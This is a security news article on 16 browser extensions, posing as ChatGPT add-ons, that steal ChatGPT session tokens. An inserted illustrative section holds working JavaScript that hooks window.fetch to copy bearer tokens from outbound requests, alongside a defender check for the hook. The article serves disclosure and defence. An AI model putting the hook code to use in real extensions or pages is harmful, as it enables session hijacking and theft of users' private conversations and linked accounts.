
Researchers find 16 browser extensions stealing ChatGPT session tokens


LayerX researchers discovered 16 malicious browser extensions that steal ChatGPT session authentication tokens, the browser security company said in a blog post Monday.  

The extensions, advertised as “ChatGPT mods,” inject a content script into the MAIN JavaScript world of the ChatGPT web page (the page’s own runtime, rather than the isolated world content scripts normally execute in), where it hooks the window.fetch function and eavesdrops on every outbound request to OpenAI’s servers.

Whenever the hook sees a request carrying an Authorization header, it copies the session token out of that header and sends it to the attacker’s server.
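As an added illustration of the mechanism described above, and not code from the extensions or from LayerX’s report, the block below shows a simplified MAIN-world fetch hook that harvests the Authorization header, beside a heuristic check a page or defender can run to notice that fetch has been replaced. The function names (installFetchHook, extractBearer, fetchLooksHooked), the `sink` callback standing in for the attacker’s server, the sample URLs and the token value are all assumptions made for the example.

```javascript
// Added example (not the extensions' code): reconstruction of a MAIN-world
// window.fetch hook that copies the bearer token out of outbound requests,
// plus a heuristic integrity check for the hook. Names, hosts and the token
// value are assumptions for illustration.

const AUTH_HEADER = "authorization";
const TARGET_HOSTS = /(^|\.)(openai\.com|chatgpt\.com)$/i;

// Normalise every shape fetch accepts for headers (a Headers instance, an
// array of [name, value] pairs, or a plain object) into a Map keyed by the
// lowercase header name.
function headerMap(headers) {
  const m = new Map();
  if (!headers) return m;
  if (Array.isArray(headers)) {
    for (const [k, v] of headers) m.set(String(k).toLowerCase(), v);
  } else if (typeof headers.forEach === "function") {
    // Headers (and Map, used as a stand-in in the demo) call back with (value, name)
    headers.forEach((v, k) => m.set(String(k).toLowerCase(), v));
  } else {
    for (const [k, v] of Object.entries(headers)) m.set(k.toLowerCase(), v);
  }
  return m;
}

// Pull the bearer token from an outbound request. The header may sit on the
// init bag (fetch(url, { headers })) or on a prepared Request object.
function extractBearer(input, init) {
  const fromInit = headerMap(init && init.headers);
  const fromRequest = headerMap(typeof input === "object" && input ? input.headers : null);
  const value = fromInit.get(AUTH_HEADER) || fromRequest.get(AUTH_HEADER);
  if (!value) return null;
  const match = /^Bearer\s+(\S+)/i.exec(String(value));
  return match ? match[1] : null;
}

// Hostname of the request target, whether fetch got a string URL or a Request.
function hostOf(input) {
  const url = typeof input === "string" ? input : (input && input.url) || "";
  try { return new URL(url).hostname; } catch { return ""; }
}

// Attacker side: replace scope.fetch with a wrapper that hands the token to
// `sink` (the malicious version POSTs it to a remote server) and then forwards
// the call unchanged so the page keeps working and nothing looks broken.
function installFetchHook(scope, sink) {
  const originalFetch = scope.fetch;
  scope.fetch = function fetch(input, init) {
    const host = hostOf(input);
    if (TARGET_HOSTS.test(host)) {
      const token = extractBearer(input, init);
      if (token) sink(host, token);
    }
    return originalFetch.apply(this, arguments);
  };
  return originalFetch;
}

// Defender side: a native fetch stringifies to "[native code]"; a plain JS
// wrapper does not. Heuristic only: a wrapper installed through
// Function.prototype.bind also reports [native code], and toString itself
// can be overridden, so treat this as a cheap first check, not proof.
function fetchLooksHooked(scope) {
  const f = scope.fetch;
  if (typeof f !== "function") return true; // removed or replaced by a non-function
  return !/\[native code\]/.test(Function.prototype.toString.call(f));
}

// Demo on a constructed scope; a real content script would pass `window`.
function demo() {
  const captured = [];
  // Stand-in for native fetch: bound functions stringify as [native code].
  const scope = { fetch: (async (input, init) => ({ ok: true })).bind(null) };
  const before = fetchLooksHooked(scope);
  installFetchHook(scope, (host, token) => captured.push({ host, token }));
  // Constructed sample requests; the token is a placeholder, not a real credential.
  scope.fetch("https://chatgpt.com/backend-api/conversations", {
    headers: { Authorization: "Bearer tok_constructed_example" }
  });
  scope.fetch("https://example.org/api", { headers: { Authorization: "Bearer not_ours" } });
  return { before, after: fetchLooksHooked(scope), captured };
}
```

In a Manifest V3 extension the MAIN-world injection is declared in the `content_scripts` entry with `"world": "MAIN"` and a `matches` pattern covering the ChatGPT origin; when vetting an extension, those two fields together are the first thing to look for, because they are exactly what lets a script reach the page’s own `window.fetch`. The toString check is only a cheap tripwire: a defender who needs certainty should capture a reference to fetch at document start or compare against the fetch of a freshly created same-origin iframe.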

This token could allow the attacker to impersonate the user’s session and gain the same access as the user, including the ability to see conversation history and potentially gain information from connected apps such as Google Drive, Slack or GitHub.

The extensions are associated with the domains chatgptmods[.]com and imagent[.]tech, with 15 published to the Chrome Web Store and one published to the Microsoft Edge Add-ons marketplace. The extensions had a total of about 900 users when they were discovered by LayerX.

One of the extensions, “ChatGPT folder, voice download, prompt manager, free tools – ChatGPT Mods” had a “Featured” badge in the Chrome Web Store, indicating it “Follows recommended practices for Chrome extensions.” All 16 extensions were still available for download in their respective marketplaces as of Monday afternoon.

LayerX noted that these extensions do not exploit a vulnerability in ChatGPT; they rely on the host permissions and content-script access granted to them at install time to interact with the ChatGPT page’s native JavaScript runtime.

The researchers recommended organizations treat any extensions that claim to integrate with authenticated AI platforms as high-risk and consider behavior-based extension monitoring solutions, which can detect activity such as suspicious DOM manipulation.

Attackers frequently use browser extensions to target sensitive data, including authentication tokens. Earlier this month, Socket’s Threat Research Team discovered five Chrome extensions designed to relay authenticated Workday, NetSuite and SuccessFactors sessions and disrupt account recovery efforts.

In December, Koi Security found a “Featured” Chrome extension disguised as a VPN was exfiltrating users’ conversations with various AI platforms, including ChatGPT, Google Gemini and Microsoft Copilot, to a remote server.

Huntress also reported last week that a malicious Chrome extension marketed as an ad blocker was used to deploy a ClickFix variant called “CrashFix,” which deliberately crashed the browser to convince users to copy and paste malicious “repair” commands into their Windows terminal.
